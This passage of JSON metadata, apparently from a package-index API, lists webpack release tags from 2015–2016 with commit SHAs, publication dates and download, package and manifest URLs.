rl":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T